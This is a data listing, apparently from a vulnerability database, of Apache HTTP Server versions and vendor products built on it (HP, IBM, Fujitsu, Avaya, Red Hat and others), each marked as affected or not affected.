vendor:	apache	model:	apache	scope:	eq	version:	2.0.46	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.45	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.44	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.43	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.42	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.41	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.40	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.39	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.38	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.37	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.36	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.35	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.32	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.21	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.20	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.19	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.18	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.17	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.16	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.64	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	ne	version:	3.8.1.1	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	ne	version:	3.7.9.1	Trust: 0.3
vendor:	juniper	model:	nsm appliance generic offline for centos	scope:	ne	version:	51	Trust: 0.3
vendor:	juniper	model:	junos space 13.1r1.6	scope:	ne	version:	-	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	ne	version:	v70001.40	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	ne	version:	v70001.3.23	Trust: 0.3
vendor:	hp	model:	xp provisioning manager	scope:	ne	version:	7.0.0-00	Trust: 0.3
vendor:	hp	model:	xp p9000 command view advanced edition	scope:	ne	version:	7.4.1-00	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	ne	version:	7.1.1	Trust: 0.3
vendor:	hp	model:	p9000 tiered storage manager	scope:	ne	version:	7.4.1-00	Trust: 0.3
vendor:	hp	model:	p9000 replication manager	scope:	ne	version:	7.4.1-00	Trust: 0.3
vendor:	hp	model:	onboard administrator	scope:	ne	version:	3.56	Trust: 0.3
vendor:	apple	model:	mac os	scope:	ne	version:	x10.8.2	Trust: 0.3
vendor:	apple	model:	mac os	scope:	ne	version:	x10.7.5	Trust: 0.3
vendor:	apache	model:	2.2.22-dev	scope:	ne	version:	-	Trust: 0.3
vendor:	apache	model:	apache	scope:	ne	version:	2.0.65	Trust: 0.3
vendor:	redhat	model:	enterprise linux ws	scope:	eq	version:	4	Trust: 0.3
vendor:	redhat	model:	enterprise linux es	scope:	eq	version:	4	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop version	scope:	eq	version:	4	Trust: 0.3
vendor:	red	model:	hat jboss enterprise web server for rhel	scope:	eq	version:	61.0	Trust: 0.3
vendor:	red	model:	hat jboss enterprise web server for rhel server	scope:	eq	version:	51.0	Trust: 0.3
vendor:	red	model:	hat enterprise linux workstation	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux server	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux hpc node optional	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux hpc node	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux desktop optional	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux desktop	scope:	eq	version:	6	Trust: 0.3
vendor:	red	model:	hat enterprise linux desktop client	scope:	eq	version:	5	Trust: 0.3
vendor:	red	model:	hat enterprise linux as	scope:	eq	version:	4	Trust: 0.3
vendor:	red	model:	hat enterprise linux server	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	4	Trust: 0.3
vendor:	oracle	model:	application server 10g r3	scope:	eq	version:	10.1.3.5.0	Trust: 0.3
vendor:	mandriva	model:	linux mandrake x86 64	scope:	eq	version:	2009.0	Trust: 0.3
vendor:	mandriva	model:	linux mandrake	scope:	eq	version:	2009.0	Trust: 0.3
vendor:	ibm	model:	os/400 v6r1m0	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	os/400 v5r5m0	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	os/400 v5r4m0	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.11	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.5	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.19	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.17	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.15	Trust: 0.3
vendor:	ibm	model:	http server	scope:	eq	version:	7.0.0.13	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.2.27	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.0.96	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.2.77	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.1.73	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.68	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.64	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.2.0-12	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.1.0.103	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.1.0.102	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.1.0-103	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.0.0.95	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.0.0-95	Trust: 0.3
vendor:	hp	model:	system management homepage b	scope:	eq	version:	3.0.2.77	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.2-77	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.1-73	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	3.0.0-68	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	0	Trust: 0.3
vendor:	hp	model:	openvms secure web server	scope:	eq	version:	2.2	Trust: 0.3
vendor:	fujitsu	model:	interstage apworks modelers-j edition l10	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage apworks modelers-j edition l10a	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage apworks modelers-j edition l10	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l20a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l20	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l11	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l10b	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l10a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition l10	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server web-j edition	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.2	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition b	scope:	eq	version:	9.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition b	scope:	eq	version:	9.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition a	scope:	eq	version:	9.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	8.0.3	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	8.0.2	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	8.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	8.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition 9.1.0b	scope:	-	version:	-	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l20a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l20	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l11	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l10b	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l10a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition l10	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard edition	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer	scope:	eq	version:	5.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer l10	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer l10	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus developer l20	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	7.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	6.0.2	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	6.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	5.1.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	5.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l11	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l11	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10c	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10b	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10a	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus l10	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server plus	scope:	eq	version:	5.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	9.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition b	scope:	eq	version:	9.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	9.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition b	scope:	eq	version:	9.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	8.0.3	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	8.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	6.0.2	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	6.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	5.1.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	5.0.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition 9.1.0b	scope:	-	version:	-	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition 9.1.0a	scope:	-	version:	-	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l11	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10	scope:	eq	version:	7.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition 6.0a	scope:	-	version:	-	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10c	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10b	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10	scope:	eq	version:	6.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	5.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l20a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l20	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l11	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10b	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10a	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition l10	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	voice portal sp2	scope:	eq	version:	4.1	Trust: 0.3
vendor:	avaya	model:	voice portal sp1	scope:	eq	version:	4.1	Trust: 0.3
vendor:	avaya	model:	voice portal	scope:	eq	version:	4.1	Trust: 0.3
vendor:	avaya	model:	voice portal	scope:	eq	version:	4.0	Trust: 0.3
vendor:	avaya	model:	message networking	scope:	eq	version:	5.2.1	Trust: 0.3
vendor:	avaya	model:	message networking	scope:	eq	version:	5.2.2	Trust: 0.3
vendor:	avaya	model:	message networking sp1	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	message networking	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	message networking	scope:	eq	version:	3.1	Trust: 0.3
vendor:	avaya	model:	meeting exchange	scope:	eq	version:	5.0.0.52	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp2	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp1	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	meeting exchange	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp1	scope:	eq	version:	5.1	Trust: 0.3
vendor:	avaya	model:	meeting exchange	scope:	eq	version:	5.1	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp2	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	meeting exchange sp1	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	meeting exchange	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.1.3	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.1.2	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.1.1	Trust: 0.3
vendor:	avaya	model:	aura system manager sp2	scope:	eq	version:	6.1	Trust: 0.3
vendor:	avaya	model:	aura system manager sp1	scope:	eq	version:	6.1	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.1	Trust: 0.3
vendor:	avaya	model:	aura system manager sp1	scope:	eq	version:	6.0	Trust: 0.3
vendor:	avaya	model:	aura system manager	scope:	eq	version:	6.0	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	5.2.1	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	5.1	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	5.0	Trust: 0.3
vendor:	avaya	model:	aura sip enablement services	scope:	eq	version:	4.0	Trust: 0.3
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	5.2	Trust: 0.3
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	5.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.2.3	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.2.2	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.2.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.0.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1.6	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1.5	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1.4	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1.3	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.2	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	4.0	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.1	Trust: 0.3
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	3.0	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.6	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.5	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.4	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.2	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.1	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.15	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.14	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.13	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.12	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.11	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.10	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.9	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.8	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.6	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.5	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.9	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.8	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.7	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.6	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.5	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.4	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.3	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.2	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1.1	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.1	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.63	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.61	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.60	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.59	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.58	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.57	Trust: 0.3
vendor:	apache	model:	software foundation apache -dev	scope:	eq	version:	2.0.56	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.56	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.55	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.54	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.53	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.52	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.51	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.50	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.49	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.48	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.47	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.46	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.45	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.44	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.43	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.42	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.41	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.40	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.39	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.38	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.37	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.36	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.35	Trust: 0.3
vendor:	apache	model:	software foundation apache -beta	scope:	eq	version:	2.0.34	Trust: 0.3
vendor:	apache	model:	software foundation apache -beta	scope:	eq	version:	2.0.32	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.32	Trust: 0.3
vendor:	apache	model:	software foundation apache -beta	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	software foundation apache beta	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.28	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0.9	Trust: 0.3
vendor:	apache	model:	software foundation apache a9	scope:	eq	version:	2.0	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.0	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.68	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.65	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.42	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.41	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.39	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.38	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.37	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.36	Trust: 0.3
vendor:	apache	model:	software foundation apache -dev	scope:	eq	version:	1.3.35	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.34	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.33	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.32	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.31	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.30	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.29	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.28	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.27	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.26	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.25	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.24	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.23	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.22	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.20	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.19	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.18	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.17	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.16	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.15	Trust: 0.3
vendor:	apache	model:	software foundation apache mac	scope:	eq	version:	1.3.14	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.14	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.13	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.12	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.11	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.10	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.9	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.8	Trust: 0.3
vendor:	apache	model:	software foundation apache -dev	scope:	eq	version:	1.3.7	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.7	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.6	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.5	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.4	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.3	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.2	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.1	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.3.38-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.3.3	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.2.7-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.2.6-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.2.5-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.21	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.20	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.19	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.18	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.17	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.16	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.2.15-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2.1	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.0.64-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.0.62-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.0.61-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 2.0.60-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache 1.3.40-dev	scope:	-	version:	-	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3.35	Trust: 0.3
vendor:	ibm	model:	http server	scope:	ne	version:	7.0.0.21	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	ne	version:	7.0	Trust: 0.3
vendor:	apache	model:	software foundation apache	scope:	ne	version:	2.2.22	Trust: 0.3

